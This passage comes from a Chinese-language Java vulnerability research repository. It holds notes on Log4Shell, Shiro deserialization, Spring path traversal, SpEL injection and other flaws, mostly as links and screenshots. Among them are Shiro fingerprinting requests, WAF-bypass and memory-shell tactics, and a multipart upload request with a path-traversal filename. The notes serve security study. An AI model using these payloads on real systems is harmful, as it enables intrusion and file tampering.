3 | - [x] [CVE-2019-17571 SocketServer RCE](CVE-2019-17571.md)
4 | - [x] [CVE-2022-23307 Chainsaw RCE](CVE-2022-23307.md)
5 |
6 |
--------------------------------------------------------------------------------
/framework/log/log4j2/CVE-2021-44228.md:
--------------------------------------------------------------------------------
1 | ### CVE-2021-44228 Log4Shell
2 |
3 | 漏洞复现
4 |
5 | 起一个恶意的LDAPRefServer、恶意类Evil
6 |
7 | 
8 |
9 | 然后触发即可
10 |
11 | 
12 |
--------------------------------------------------------------------------------
/framework/log/log4j2/README.md:
--------------------------------------------------------------------------------
1 | 历史漏洞
2 |
3 | - [x] [CVE-2021-44228 JNDI -> RCE](CVE-2021-44228.md)
--------------------------------------------------------------------------------
/framework/log/logback/利用研究.md:
--------------------------------------------------------------------------------
1 |
2 | - https://mp.weixin.qq.com/s/OBwxaijYCjnvo8I0OBusug
3 |
--------------------------------------------------------------------------------
/framework/microservice/dropwizard/README.md:
--------------------------------------------------------------------------------
1 | Dropwizard self-validating feature enabling attackers to inject arbitrary Java EL expressions, leading to RCE vulnerability.
2 |
3 | vulnerable code snippet
4 | ```java
5 | // com.example.helloworld.core.Person#validateFullName
6 |
7 | @SelfValidation
8 | public void validateFullName(ViolationCollector col) {
9 | if (fullName.contains("$")) {
10 | col.addViolation("Full name contains invalid characters: " + fullName);
11 | }
12 | }
13 |
14 | // io.dropwizard.validation.selfvalidating.ViolationCollector#addViolation
15 | public void addViolation(String msg) {
16 | this.violationOccurred = true;
17 | this.context.buildConstraintViolationWithTemplate(msg).addConstraintViolation();
18 | }
19 |
20 | ```
21 |
22 |
23 | issue reproduction
24 |
25 |
26 | 
27 |
--------------------------------------------------------------------------------
/framework/microservice/flink/README.md:
--------------------------------------------------------------------------------
1 | 历史漏洞
2 |
3 | - [x] [CVE-2020-17518 文件上传](https://mp.weixin.qq.com/s/Wtcm8AFM5HrPOZ1tA0oHMg)
4 | - [x] [CVE-2020-17519 文件读取](https://mp.weixin.qq.com/s/Wtcm8AFM5HrPOZ1tA0oHMg)
5 |
6 |
--------------------------------------------------------------------------------
/framework/microservice/jenkins/README.md:
--------------------------------------------------------------------------------
1 | 相关漏洞
2 | ---
3 |
4 | ### CVE-2015-8103 反序列化 -> RCE
5 |
6 | - https://mp.weixin.qq.com/s/g91wUz8QaOz7qvQodIO5UQ
7 |
--------------------------------------------------------------------------------
/framework/microservice/shenyu/README.md:
--------------------------------------------------------------------------------
1 | 相关漏洞
2 | ---
3 |
4 | ### CVE-2021-45029 Groovy & SpEL Injection
5 |
6 | - https://mp.weixin.qq.com/s/SdNLthm5Ll3SnRhO0dGGgA
7 |
8 | ### CVE-2021-37580 Auth bypass
9 |
10 | - https://mp.weixin.qq.com/s/LwpXJPFIjZkwXcMl8KU2fw
11 |
12 |
--------------------------------------------------------------------------------
/framework/microservice/skywalking/skywalking.assets/image-20220113130647264.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/microservice/skywalking/skywalking.assets/image-20220113130647264.png
--------------------------------------------------------------------------------
/framework/microservice/skywalking/skywalking.assets/image-20220113144532353.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/microservice/skywalking/skywalking.assets/image-20220113144532353.png
--------------------------------------------------------------------------------
/framework/microservice/skywalking/skywalking.assets/image-20220113144942928.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/microservice/skywalking/skywalking.assets/image-20220113144942928.png
--------------------------------------------------------------------------------
/framework/microservice/skywalking/skywalking.assets/image-20220113145030966.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/microservice/skywalking/skywalking.assets/image-20220113145030966.png
--------------------------------------------------------------------------------
/framework/microservice/skywalking/skywalking.assets/image-20220113155050988.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/microservice/skywalking/skywalking.assets/image-20220113155050988.png
--------------------------------------------------------------------------------
/framework/microservice/skywalking/skywalking.assets/image-20220114133448365.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/microservice/skywalking/skywalking.assets/image-20220114133448365.png
--------------------------------------------------------------------------------
/framework/microservice/skywalking/skywalking.assets/image-20220114140427507.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/microservice/skywalking/skywalking.assets/image-20220114140427507.png
--------------------------------------------------------------------------------
/framework/microservice/skywalking/skywalking.assets/image-20220114144223966.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/microservice/skywalking/skywalking.assets/image-20220114144223966.png
--------------------------------------------------------------------------------
/framework/microservice/skywalking/skywalking.assets/image-20220114152004486.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/microservice/skywalking/skywalking.assets/image-20220114152004486.png
--------------------------------------------------------------------------------
/framework/microservice/spark/README.md:
--------------------------------------------------------------------------------
1 | 前置基础
2 | ---
3 |
4 |
5 | 相关漏洞
6 | ---
7 |
8 | ### Spark Shell命令注入漏洞
9 | > 占坑
10 |
11 | - [详见](https://t.zsxq.com/IQRZrRZ)
12 |
13 |
14 | 在 org.apache.hadoop.fs.FileUtill 类的 unTar 方法里,用的 bash shell 命令拼接,所以可以使用命令加载恶意文件名的 tar 文件达到rce的效果。
15 |
16 | 
17 |
18 |
--------------------------------------------------------------------------------
/framework/microservice/spring cloud/function/README.md:
--------------------------------------------------------------------------------
1 | 前置基础
2 | ---
3 | **简介**
4 |
5 | SpringCloudFunction是SpringBoot开发的一个Servless中间件(FAAS),支持基于SpEL的函数式动态路由。
6 |
7 | 相关漏洞
8 | ---
9 |
10 | ### Spring Cloud Function v3.x SpEL RCE
11 |
12 | 详细分析见
13 | - [Spring Cloud Function v3.x SpEL RCE](https://mp.weixin.qq.com/s/U7YJ3FttuWSOgCodVSqemg)
14 |
15 | **第1种利用:需要修改配置+任意路由**
16 |
17 | 
18 |
19 |
20 | **第2种利用:默认配置+特定路由**
21 |
22 | 
23 |
--------------------------------------------------------------------------------
/framework/microservice/spring cloud/gateway/README.md:
--------------------------------------------------------------------------------
1 | 相关漏洞
2 | ---
3 |
4 |
5 | ### CVE-2022-22947 SpEL Injection -> RCE
6 |
7 | 参考
8 | - [Spring cloud gateway通过SPEL注入内存马](https://gv7.me/articles/2022/the-spring-cloud-gateway-inject-memshell-through-spel-expressions/)
9 | - [表达式注入 -> RCE](https://github.com/nbxiglk0/Note/blob/master/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/Java/Spring%20Cloud%20GateWay/CVE-2022-22947/CVE-2022-22947.md)
10 | - https://github.com/vulhub/vulhub/blob/master/spring/CVE-2022-22947/README.zh-cn.md
11 |
12 |
13 | 环境搭建
14 | ```
15 | git clone https://github.com/spring-cloud/spring-cloud-gateway
16 | cd spring-cloud-gateway
17 | git checkout v3.1.0
18 | ```
19 | 创建供codeql使用的数据库
20 | ```
21 | codeql database create ..\databases\spring-cloud-gateway-310 --language="java" --command="mvn clean install --file pom.xml -Dmaven.test.skip=true"
22 | ```
23 |
24 |
--------------------------------------------------------------------------------
/framework/rpc/dubbo/README.md:
--------------------------------------------------------------------------------
1 | 历史漏洞
2 |
3 | - [x] [CVE-2021-43297 Hessian2 反序列化](CVE-2021-43297.md)
4 | - [ ] CVE-2021-37579 Pre-Auth Unsafe Java Deserialization
--------------------------------------------------------------------------------
/framework/rpc/dubbo/img/7yut5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/rpc/dubbo/img/7yut5.png
--------------------------------------------------------------------------------
/framework/rpc/dubbo/img/image-20220104011320460.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/rpc/dubbo/img/image-20220104011320460.png
--------------------------------------------------------------------------------
/framework/rpc/dubbo/img/image-20220118145950795.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/rpc/dubbo/img/image-20220118145950795.png
--------------------------------------------------------------------------------
/framework/rpc/dubbo/img/image-20220118150055029.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/rpc/dubbo/img/image-20220118150055029.png
--------------------------------------------------------------------------------
/framework/rpc/dubbo/img/image-20220118162819016.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/rpc/dubbo/img/image-20220118162819016.png
--------------------------------------------------------------------------------
/framework/security/shiro/README.md:
--------------------------------------------------------------------------------
1 | 历史漏洞
2 |
3 | - [x] CVE-2016-4437 (Shiro550)
4 | - [ ] CVE-2019-12422 (Shiro721)
5 |
6 |
--------------------------------------------------------------------------------
/framework/security/shiro/img/1d55510c8cc34de68d7a8bc524dc70bf.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/security/shiro/img/1d55510c8cc34de68d7a8bc524dc70bf.png
--------------------------------------------------------------------------------
/framework/security/shiro/img/2b21b16367074384ac407365178e92e1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/security/shiro/img/2b21b16367074384ac407365178e92e1.png
--------------------------------------------------------------------------------
/framework/security/shiro/img/601125e5b570489bb7e86579bb2dea6e.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/security/shiro/img/601125e5b570489bb7e86579bb2dea6e.png
--------------------------------------------------------------------------------
/framework/security/shiro/img/662a7151089b4e999ac3aecef5628e8d.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/security/shiro/img/662a7151089b4e999ac3aecef5628e8d.png
--------------------------------------------------------------------------------
/framework/security/shiro/img/image-20211022233907942.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/security/shiro/img/image-20211022233907942.png
--------------------------------------------------------------------------------
/framework/security/shiro/img/image-20211118144237427.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/security/shiro/img/image-20211118144237427.png
--------------------------------------------------------------------------------
/framework/security/shiro/img/image-20211118144314386.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/security/shiro/img/image-20211118144314386.png
--------------------------------------------------------------------------------
/framework/security/shiro/img/image-20211118144525625.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/security/shiro/img/image-20211118144525625.png
--------------------------------------------------------------------------------
/framework/security/shiro/img/image-20211118145028082.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/security/shiro/img/image-20211118145028082.png
--------------------------------------------------------------------------------
/framework/security/shiro/img/image-20211118145106465.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/security/shiro/img/image-20211118145106465.png
--------------------------------------------------------------------------------
/framework/security/shiro/img/image-20211118145151098.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/security/shiro/img/image-20211118145151098.png
--------------------------------------------------------------------------------
/framework/security/shiro/img/image-20211118145958901.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/security/shiro/img/image-20211118145958901.png
--------------------------------------------------------------------------------
/framework/security/shiro/img/image-20211118150027658.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/security/shiro/img/image-20211118150027658.png
--------------------------------------------------------------------------------
/framework/security/shiro/img/image-20211118150058675.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/security/shiro/img/image-20211118150058675.png
--------------------------------------------------------------------------------
/framework/security/shiro/img/image-20211118150110191.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/security/shiro/img/image-20211118150110191.png
--------------------------------------------------------------------------------
/framework/security/shiro/img/image-20211118150245948.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/security/shiro/img/image-20211118150245948.png
--------------------------------------------------------------------------------
/framework/security/shiro/img/image-20211118150319178.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/security/shiro/img/image-20211118150319178.png
--------------------------------------------------------------------------------
/framework/security/shiro/img/image-20211118153223684.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/security/shiro/img/image-20211118153223684.png
--------------------------------------------------------------------------------
/framework/security/shiro/img/image-20211118154359697.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/security/shiro/img/image-20211118154359697.png
--------------------------------------------------------------------------------
/framework/security/shiro/img/image-20211118154624802.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/security/shiro/img/image-20211118154624802.png
--------------------------------------------------------------------------------
/framework/security/shiro/img/image-20211118154847035.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/security/shiro/img/image-20211118154847035.png
--------------------------------------------------------------------------------
/framework/security/shiro/img/image-20211118154924247.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/security/shiro/img/image-20211118154924247.png
--------------------------------------------------------------------------------
/framework/security/shiro/img/image-20211118155031602.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/security/shiro/img/image-20211118155031602.png
--------------------------------------------------------------------------------
/framework/security/shiro/img/image-20211118155359227.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/security/shiro/img/image-20211118155359227.png
--------------------------------------------------------------------------------
/framework/security/shiro/img/image-20211118155853780.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/security/shiro/img/image-20211118155853780.png
--------------------------------------------------------------------------------
/framework/security/shiro/img/image-20211118160532010.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/security/shiro/img/image-20211118160532010.png
--------------------------------------------------------------------------------
/framework/security/shiro/利用研究.md:
--------------------------------------------------------------------------------
1 | 指纹识别
2 | ---
3 |
4 | - Request 的 Cookie 不携带 `rememberMe=1` , 此时 Response 的 Set-Cookie 返回 1 个 `rememberMe=deleteMe`
5 |
6 | ```http request
7 | POST /shiroweb_war_exploded/login.jsp HTTP/1.1
8 | Host: localhost:9090
9 | Content-Type: application/x-www-form-urlencoded
10 | Content-Length: 2
11 | Cookie:
12 | ```
13 | 
14 |
15 |
16 | - Request 的 Cookie 不携带 `rememberMe=1` , 此时 Response 的 Set-Cookie 返回 2 个 `rememberMe=deleteMe`
17 |
18 | ```http request
19 | POST /shiroweb_war_exploded/login.jsp HTTP/1.1
20 | Host: localhost:9090
21 | Content-Type: application/x-www-form-urlencoded
22 | Content-Length: 2
23 | Cookie: rememberMe=1
24 | ```
25 | 
26 |
27 | 漏洞利用
28 | ---
29 | #### 回显
30 |
31 | - [Java中间件通用回显方法的问题及处理 by fnmsd](https://blog.csdn.net/fnmsd/article/details/106890242)
32 |
33 | 抄一遍, 然后塞到 CommonsBeanutils gadget 里
34 |
35 | 已测试中间件
36 | - tomcat v9
37 | - resin v4.0.66
38 |
39 | 测试效果:
40 | 
41 |
42 | 
43 |
44 |
45 |
46 |
47 |
48 |
49 | #### 内存马/代理
50 |
51 |
52 | #### 修改 Key
53 |
54 | - [通过代码执行修改Shiro密钥](http://www.yulegeyu.com/2021/11/19/%E9%80%9A%E8%BF%87%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E4%BF%AE%E6%94%B9Shiro%E5%AF%86%E9%92%A5/)
55 |
56 |
57 | 实战问题
58 | ---
59 |
60 | ### Request header is too large
61 |
62 | 解决方法:
63 | - 修改 tomcat 的 maxHeaderSize
64 | - 分离 payload, 字节码动态加载
65 | - 通过线程持久化存储 payload, 然后再触发
66 | - [浅谈Shiro550受Tomcat-Header长度限制影响突破](https://y4tacker.github.io/2022/04/14/year/2022/4/%E6%B5%85%E8%B0%88Shiro550%E5%8F%97Tomcat-Header%E9%95%BF%E5%BA%A6%E9%99%90%E5%88%B6%E5%BD%B1%E5%93%8D%E7%AA%81%E7%A0%B4/#0x02-%E6%B5%85%E8%B0%88%E6%96%B0%E6%80%9D%E8%B7%AF)
67 |
68 |
69 | ### SUID
70 |
71 | 解决方法:
72 | - 替换本地依赖包版本去生成 payload
73 | - 修改字节码
74 | - [Modify ysoserial jar serialVersionUID](http://www.yulegeyu.com/2019/03/09/Modify-Ysoseriali-jar-serialVersionUID/)
75 | - 自定义ClassLoader
76 | - [使用自定义ClassLoader解决反序列化serialVesionUID不一致问题](https://gv7.me/articles/2020/deserialization-of-serialvesionuid-conflicts-using-a-custom-classloader/)
77 |
78 | ### Unable to deserialze argument byte array
79 |
80 | 无法利用 Commons-Collections 3.x 版本包含 Transform 数组的 gadget
81 |
82 | 解决方法:
83 | - 修改 Commons-Collections 3.x 系列 gadget 通过 TemplatesImpl 加载字节码
84 | - [Java反序列化利用链分析之Shiro反序列化](https://www.anquanke.com/post/id/192619)
85 | - 使用 CommonsBeanutils 系列 gadget
86 | - [CommonsBeanutils与无commons-collections的Shiro反序列化利用](https://www.leavesongs.com/PENETRATION/commons-beanutils-without-commons-collections.html)
87 |
88 | WAF 对抗
89 | ---
90 |
91 | > 相关案例
92 | - [01 shiro反序列化绕WAF之未知HTTP请求方法](https://gv7.me/articles/2021/shiro-deserialization-bypasses-waf-through-unknown-http-method/)
93 | - [02 渗透遇shiro,看我巧绕waf](https://mp.weixin.qq.com/s/GKbE44VclJKj2PZ4Cpr_Sw)
94 |
--------------------------------------------------------------------------------
/framework/security/spring security/README.md:
--------------------------------------------------------------------------------
1 | 相关漏洞
2 |
3 |
4 | - [x] [CVE-2022-22978 Auth Bypass - RegexRequestMatcher](img/CVE-2022-22978.png)
5 | - [x] [Authorization bypass again ?](auth-bypass%20again.md)
6 |
7 |
--------------------------------------------------------------------------------
/framework/security/spring security/auth-bypass again.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | 
4 |
--------------------------------------------------------------------------------
/framework/security/spring security/img/CVE-2022-22978.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/security/spring security/img/CVE-2022-22978.png
--------------------------------------------------------------------------------
/framework/web service/axis/README.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/framework/web service/cxf/README.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/framework/web service/jersey/README.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/framework/web service/wink/README.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/framework/web service/xfire/README.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/framework/web/dwr/README.md:
--------------------------------------------------------------------------------
1 |
2 | debug默认路径:
3 | ```
4 | dwr/index.html
5 | ```
6 | 
7 |
--------------------------------------------------------------------------------
/framework/web/ruoyi/README.md:
--------------------------------------------------------------------------------
1 | 相关漏洞
2 | ---
3 |
4 | - [01 某依rce黑名单多种bypass方法分析](https://xz.aliyun.com/t/10957)
5 | - [02 某依后台RCE分析](https://xz.aliyun.com/t/10687)
6 | - [03 RuoYi 可用内存马](https://xz.aliyun.com/t/10651)
7 | - [04 若依管理后台的一些代码执行漏洞](https://xz.aliyun.com/t/10637)
8 |
--------------------------------------------------------------------------------
/framework/web/spring boot/README.md:
--------------------------------------------------------------------------------
1 | > attack vectors
2 |
3 | - https://github.com/pyn3rd/Spring-Boot-Vulnerability
4 | - https://github.com/LandGrey/SpringBootVulExploit
5 |
6 |
--------------------------------------------------------------------------------
/framework/web/spring boot/SpringBoot MultipartFile.getOriginalFilename() 差异梳理.md:
--------------------------------------------------------------------------------
1 | ##### v2.7.2
2 |
3 | ###### 缺省设置 - StandardMultipartFile - 可路径穿越
4 |
5 | - spring-autoconfigure-metadata.properties
6 |
7 | 
8 | - org.springframework.web.servlet.DispatcherServlet#checkMultipart
9 |
10 | 
11 |
12 | - org.springframework.web.multipart.support.StandardMultipartHttpServletRequest.StandardMultipartFile#getOriginalFilename
13 |
14 | ```java
15 | public String getOriginalFilename() {
16 | return this.filename;
17 | }
18 | ```
19 |
20 | 没有对文件名进行处理,可以使用 `../` 进行路径穿越
21 |
22 | 
23 |
24 | 
25 |
26 | ###### 自定义设置 - CommonsMultipartResolver - 不可路径穿越
27 |
28 | 需要引入 `commons-fileupload` 依赖
29 |
30 | ```xml
31 |
32 | commons-fileupload
33 | commons-fileupload
34 | 1.4
35 |
36 | ```
37 |
38 | - org.springframework.web.multipart.commons.CommonsMultipartFile#getOriginalFilename
39 |
40 | ```java
41 | public String getOriginalFilename() {
42 | String filename = this.fileItem.getName();
43 | if (filename == null) {
44 | return "";
45 | } else if (this.preserveFilename) {
46 | return filename;
47 | } else {
48 | // 出现 Linux 下分隔符的最后一个位置 `\`
49 | int unixSep = filename.lastIndexOf(47);
50 | // 出现 Windows 下分隔符的最后一个位置 `/`
51 | int winSep = filename.lastIndexOf(92);
52 | // 比较 Lin 分隔符 和 Win 分隔符的位置,选择最靠后的位置
53 | int pos = Math.max(winSep, unixSep);
54 | // 截取最靠后的分隔符的位置进行截取
55 | // ../../\\/./filename -> filename
56 | return pos != -1 ? filename.substring(pos + 1) : filename;
57 | }
58 | }
59 | ```
60 |
61 | 
62 |
63 | ##### <= v1.2.7.RELEASE
64 |
65 | ###### 自定义设置 - CommonsMultipartResolver - 可路径穿越
66 |
67 | > 内嵌 spring-web-4.1.8,而 Windows 下的路径穿越问题在 4.1.9 才修复。
68 |
69 | - org.springframework.web.multipart.commons.CommonsMultipartFile#getOriginalFilename
70 |
71 | ```java
72 | public String getOriginalFilename() {
73 | String filename = this.fileItem.getName();
74 | if (filename == null) {
75 | return "";
76 | } else {
77 | int pos = filename.lastIndexOf("/");
78 | /**
79 | * filename = ../..\\flag.txt
80 | * pos == 2 != -1
81 | * filename = filename.substring(pos + 1) =
82 | * */
83 |
84 | if (pos == -1) {
85 | pos = filename.lastIndexOf("\\");
86 | }
87 |
88 | return pos != -1 ? filename.substring(pos + 1) : filename;
89 | }
90 | }
91 | ```
92 |
93 | 已在 v4.0.9 修复
94 |
95 | 
96 |
--------------------------------------------------------------------------------
/framework/web/spring boot/img/Pasted image 20220818202936.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/web/spring boot/img/Pasted image 20220818202936.png
--------------------------------------------------------------------------------
/framework/web/spring boot/img/Pasted image 20220818202952.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/web/spring boot/img/Pasted image 20220818202952.png
--------------------------------------------------------------------------------
/framework/web/spring boot/img/Pasted image 20220818203007.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/web/spring boot/img/Pasted image 20220818203007.png
--------------------------------------------------------------------------------
/framework/web/spring boot/img/Pasted image 20220818203017.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/web/spring boot/img/Pasted image 20220818203017.png
--------------------------------------------------------------------------------
/framework/web/spring boot/img/Pasted image 20220818203038.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/web/spring boot/img/Pasted image 20220818203038.png
--------------------------------------------------------------------------------
/framework/web/spring webflux/README.md:
--------------------------------------------------------------------------------
1 | 前置基础
2 | ---
3 |
4 | **应用简介**
5 |
6 | WebFlux 是一个 Spring 响应式 Web 框架。它已添加到 Spring 5 中。它是完全非阻塞的,支持 reactive streams 响应流,并且可以很好运行在 Netty,Undertow 和 Servlet 3.1 + 容器等服务器上, 是传统 Spring MVC 的一个替代方案。
7 | Spring WebFlux 在内部使用 Project Reactor 和它的 Publisher 实现 Flux 和 Mono。它支持两种编程模型:a)基于注释的响应式组件,b)函数级别的路由和处理。
8 |
9 |
10 |
11 |
12 | 相关漏洞
13 | ---
14 |
15 |
16 | 研究利用
17 | ---
18 |
19 | ### 回显
20 |
21 |
22 | ### 内存马
23 |
24 |
--------------------------------------------------------------------------------
/framework/web/spring/spring framework/CommonsMultipartFile.getOriginalFilename 绕过.md:
--------------------------------------------------------------------------------
1 | 前置条件
2 |
3 | - spring-web <= 4.1.8.RELEASE 对应 spingboot <= v1.2.7.RELEASE
4 | - Windows
5 |
6 |
7 | ```
8 | \org\springframework\spring-web\4.0.8.RELEASE\spring-web-4.1.8.RELEASE.jar!\org\springframework\web\multipart\commons\CommonsMultipartFile.class
9 | ```
10 |
11 | ```http
12 | POST /upload HTTP/1.1
13 | Host: localhost:9090
14 | Content-Type: multipart/form-data; boundary=2022
15 | Content-Length: 114
16 |
17 | --2022
18 | Content-Disposition: form-data; name="file"; filename="../..\\..\\..\\flag.txt"
19 |
20 | hello world
21 | --2022--
22 | ```
23 |
24 | - org.springframework.web.multipart.commons.CommonsMultipartFile#getOriginalFilename
25 |
26 | 
27 |
28 | - `filename="../..\\..\\..\\flag.txt"` or `filename="../..\..\..\flag.txt"`
29 | - pos = 2 且 != -1 ,所以不会对 `\` 进行处理
30 | - 而Windows是支持 `..\` 和 `..\\`的
31 | - 
32 | - 从而可以进行路径穿越
33 |
34 |
35 | 修复:
36 |
37 | 
38 |
--------------------------------------------------------------------------------
/framework/web/spring/spring framework/README.md:
--------------------------------------------------------------------------------
1 | 前置基础
2 | ---
3 |
4 |
5 |
6 | 相关漏洞
7 | ---
8 |
9 | ### Spring CVE-2010-1622 RCE
10 |
11 | - [SpringMVC框架任意代码执行漏洞(CVE-2010-1622)分析](http://rui0.cn/archives/1158)
12 |
13 | ### Spring 2022-03-29 RCE
14 | > 占坑
15 |
16 | - 用jdk9的特性绕过,然后结合某机制写入文件
17 |
18 | 
19 |
20 |
21 | 利用研究
22 | ---
23 |
24 | - Spring Boot Fat Jar + 任意文件写入
25 |
--------------------------------------------------------------------------------
/framework/web/spring/spring framework/img/Pasted image 20220818204052.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/web/spring/spring framework/img/Pasted image 20220818204052.png
--------------------------------------------------------------------------------
/framework/web/spring/spring framework/img/Pasted image 20220818204102.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/web/spring/spring framework/img/Pasted image 20220818204102.png
--------------------------------------------------------------------------------
/framework/web/spring/spring framework/img/Pasted image 20220818204110.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/web/spring/spring framework/img/Pasted image 20220818204110.png
--------------------------------------------------------------------------------
/framework/web/spring/spring messaging/vulnerability-research.assets/image-20211116215130852.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/web/spring/spring messaging/vulnerability-research.assets/image-20211116215130852.png
--------------------------------------------------------------------------------
/framework/web/spring/spring messaging/vulnerability-research.assets/image-20211116215228659.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/web/spring/spring messaging/vulnerability-research.assets/image-20211116215228659.png
--------------------------------------------------------------------------------
/framework/web/spring/spring messaging/vulnerability-research.assets/image-20211116215431393.png:
